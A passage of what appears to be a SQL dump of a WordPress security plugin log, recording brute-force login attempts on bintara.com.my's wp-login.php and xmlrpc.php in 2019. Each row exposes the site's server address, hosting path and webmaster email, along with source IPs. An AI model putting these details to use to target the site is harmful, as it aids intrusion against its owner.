11:51:19',18252832,19549984,'https://bintara.com.my/xmlrpc.php',1,0,'159.203.88.120'),(24100,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"22231\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX94snPgbK7GuRh1kKnMkwAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635058.8639\";s:12:\"REQUEST_TIME\";s:10:\"1568635058\";}}','notice','2019-09-16 11:57:40','2019-09-16 11:57:39',17743080,19228168,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24101,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"22231\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX94snPgbK7GuRh1kKnMkwAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635058.8639\";s:12:\"REQUEST_TIME\";s:10:\"1568635058\";}}','notice','2019-09-16 11:57:40','2019-09-16 11:57:39',17904712,19228168,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24102,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"23167\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX94tXPgbK7GuRh1kKnMlgAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635062.0918\";s:12:\"REQUEST_TIME\";s:10:\"1568635062\";}}','notice','2019-09-16 11:57:43','2019-09-16 11:57:42',18252832,19549984,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24103,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.202.249.38\";s:11:\"REMOTE_PORT\";s:5:\"59084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX94yHPgbK7GuRh1kKnMqQAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635080.3727\";s:12:\"REQUEST_TIME\";s:10:\"1568635080\";}}','notice','2019-09-16 11:58:01','2019-09-16 11:58:00',17738304,19228352,'https://bintara.com.my/wp-login.php',1,0,'82.202.249.38'),(24104,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.202.249.38\";s:11:\"REMOTE_PORT\";s:5:\"59748\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX94y71rBLb0GV3O7mTfzwAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635083.2381\";s:12:\"REQUEST_TIME\";s:10:\"1568635083\";}}','notice','2019-09-16 11:58:04','2019-09-16 11:58:03',18253544,19550792,'https://bintara.com.my/xmlrpc.php',1,0,'82.202.249.38'),(24105,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"37038\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX97YXPgbK7GuRh1kKnPPwAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635745.3037\";s:12:\"REQUEST_TIME\";s:10:\"1568635745\";}}','notice','2019-09-16 12:09:06','2019-09-16 12:09:05',17743080,19228168,'https://bintara.com.my/wp-login.php',1,0,'74.115.209.253'),(24106,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"37038\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX97YXPgbK7GuRh1kKnPPwAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635745.3037\";s:12:\"REQUEST_TIME\";s:10:\"1568635745\";}}','notice','2019-09-16 12:09:07','2019-09-16 12:09:05',17904440,19228168,'https://bintara.com.my/wp-login.php',1,0,'74.115.209.253'),(24107,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"37530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX97ZHPgbK7GuRh1kKnPQgAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635748.1637\";s:12:\"REQUEST_TIME\";s:10:\"1568635748\";}}','notice','2019-09-16 12:09:09','2019-09-16 12:09:08',18252832,19549984,'https://bintara.com.my/xmlrpc.php',1,0,'74.115.209.253'),(24108,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.207.118\";s:11:\"REMOTE_PORT\";s:5:\"33022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX98VHPgbK7GuRh1kKnQQgAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568635988.2808\";s:12:\"REQUEST_TIME\";s:10:\"1568635988\";}}','notice','2019-09-16 12:13:09','2019-09-16 